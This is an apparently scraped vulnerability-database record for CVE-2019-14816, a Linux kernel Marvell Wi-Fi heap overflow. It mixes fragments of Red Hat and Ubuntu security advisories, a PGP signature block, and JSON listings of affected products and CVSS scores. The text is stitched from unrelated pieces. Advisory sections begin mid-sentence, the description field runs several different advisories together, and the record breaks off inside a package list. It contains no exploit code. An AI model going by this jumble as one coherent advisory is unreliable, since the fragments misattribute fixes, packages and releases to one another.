https://access.redhat.com/security/cve/CVE-2019-14816 https://access.redhat.com/security/cve/CVE-2019-14895 https://access.redhat.com/security/cve/CVE-2019-14898 https://access.redhat.com/security/cve/CVE-2019-14901 https://access.redhat.com/security/cve/CVE-2019-17133 https://access.redhat.com/security/updates/classification/#important

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK kzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry plZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg 9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6 q6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7 DfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI EOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz hTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci N0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh wqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz hk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6 IwzrfQ6EsXE= =mofI -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

Enhancement(s):

Selective backport: perf: Sync with upstream v4.16 (BZ#1782748)
Please note that the RDS protocol is blacklisted in Ubuntu by default. ========================================================================= Ubuntu Security Notice USN-4163-2 October 23, 2019

linux-lts-xenial, linux-aws vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 ESM.

It was discovered that a race condition existed in the ARC EMAC ethernet driver for the Linux kernel, resulting in a use-after-free vulnerability. An attacker could use this to cause a denial of service (system crash). (CVE-2016-10906)

It was discovered that a race condition existed in the Serial Attached SCSI (SAS) implementation in the Linux kernel when handling certain error conditions. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18232)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. (CVE-2018-21008)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14814, CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)

Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel did not properly validate device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15117)

Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel improperly performed recursion while handling device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15118)

It was discovered that the Technisat DVB-S/S2 USB device driver in the Linux kernel contained a buffer overread. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2019-15505)

Brad Spengler discovered that a Spectre mitigation was improperly implemented in the ptrace susbsystem of the Linux kernel. A local attacker could possibly use this to expose sensitive information. (CVE-2019-15902)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-4.4.0-1056-aws 4.4.0-1056.60 linux-image-4.4.0-166-generic 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-generic-lpae 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-lowlatency 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-e500mc 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-smp 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-emb 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-smp 4.4.0-166.195~14.04.1 linux-image-aws 4.4.0.1056.57 linux-image-generic-lpae-lts-xenial 4.4.0.166.145 linux-image-generic-lts-xenial 4.4.0.166.145 linux-image-lowlatency-lts-xenial 4.4.0.166.145 linux-image-powerpc-e500mc-lts-xenial 4.4.0.166.145 linux-image-powerpc-smp-lts-xenial 4.4.0.166.145 linux-image-powerpc64-emb-lts-xenial 4.4.0.166.145 linux-image-powerpc64-smp-lts-xenial 4.4.0.166.145 linux-image-virtual-lts-xenial 4.4.0.166.145

After a standard system update you need to reboot your computer to make all the necessary changes.

Bug Fix(es):

patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt] (BZ#1772522)
kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)
kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency requirement (BZ#1781157)
kernel-rt: hard lockup panic in during execution of CFS bandwidth period timer (BZ#1788057)

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.74"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "a320",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.194"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "_id": null,
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.194"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.75"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "c190",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "_id": null,
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "_id": null,
        "model": "a220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "fas2720",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6_ppc64"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "_id": null,
        "model": "messaging realtime grid",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "_id": null,
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.2"
      },
      {
        "_id": null,
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "_id": null,
        "model": "enterprise linux tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "_id": null,
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2.17"
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "a800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.146"
      },
      {
        "_id": null,
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "_id": null,
        "model": "fas2750",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Ubuntu,Red Hat",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-14816",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-14816",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.0,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-14816",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "secalert@redhat.com",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-14816",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-14816",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "secalert@redhat.com",
            "id": "CVE-2019-14816",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201908-2176",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. 7) - aarch64, noarch, ppc64le\n\n3. \n\nBug Fix(es):\n\n* Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)\n\n* Kernel modules generated incorrectly when system is localized to\nnon-English language (BZ#1705285)\n\n* RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)\n\n4. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* Slow console output with ast (Aspeed) graphics driver (BZ#1780145)\n\n* core: backports from upstream (BZ#1794373)\n\n* System Crash on vport creation (NPIV on FCoE) (BZ#1796362)\n\n* [GSS] Can\u0027t access the mount point due to possible blocking of i/o on rbd\n(BZ#1796432)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2020:0374-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:0374\nIssue date:        2020-02-04\nCVE Names:         CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 \n                   CVE-2019-14901 CVE-2019-17133 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi\ndriver (CVE-2019-14816)\n\n* kernel: heap-based buffer overflow in mwifiex_process_country_ie()\nfunction in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c\n(CVE-2019-14895)\n\n* kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)\n\n* kernel: buffer overflow in cfg80211_mgd_wext_giwessid in\nnet/wireless/wext-sme.c (CVE-2019-17133)\n\n* kernel: incomplete fix  for race condition between\nmmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599\n(CVE-2019-14898)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [Azure][7.8] Include patch \"PCI: hv: Avoid use of hv_pci_dev-\u003epci_slot\nafter freeing it\" (BZ#1766089)\n\n* [Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat,\nnetwork interface(eth0) moved to new network namespace does not obtain IP\naddress. (BZ#1766093)\n\n* [Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed\n(BZ#1766097)\n\n* SMB3: Do not error out on large file transfers if server responds with\nSTATUS_INSUFFICIENT_RESOURCES (BZ#1767621)\n\n* Since RHEL commit 5330f5d09820 high load can cause dm-multipath path\nfailures (BZ#1770113)\n\n* Hard lockup in free_one_page()-\u003e_raw_spin_lock() because sosreport\ncommand is reading from /proc/pagetypeinfo (BZ#1770732)\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)\n\n* fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64\n(BZ#1775678)\n\n* Guest crash after load cpuidle-haltpoll driver (BZ#1776289)\n\n* RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of\nretry delay value (BZ#1776290)\n\n* Multiple \"mv\" processes hung on a gfs2 filesystem (BZ#1777297)\n\n* Moving Egress IP will result in conntrack sessions being DESTROYED\n(BZ#1779564)\n\n* core: backports from upstream (BZ#1780033)\n\n* kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)\n\n* Race between tty_open() and flush_to_ldisc()  using the\ntty_struct-\u003edriver_data field. (BZ#1780163)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1062.12.1.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1062.12.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc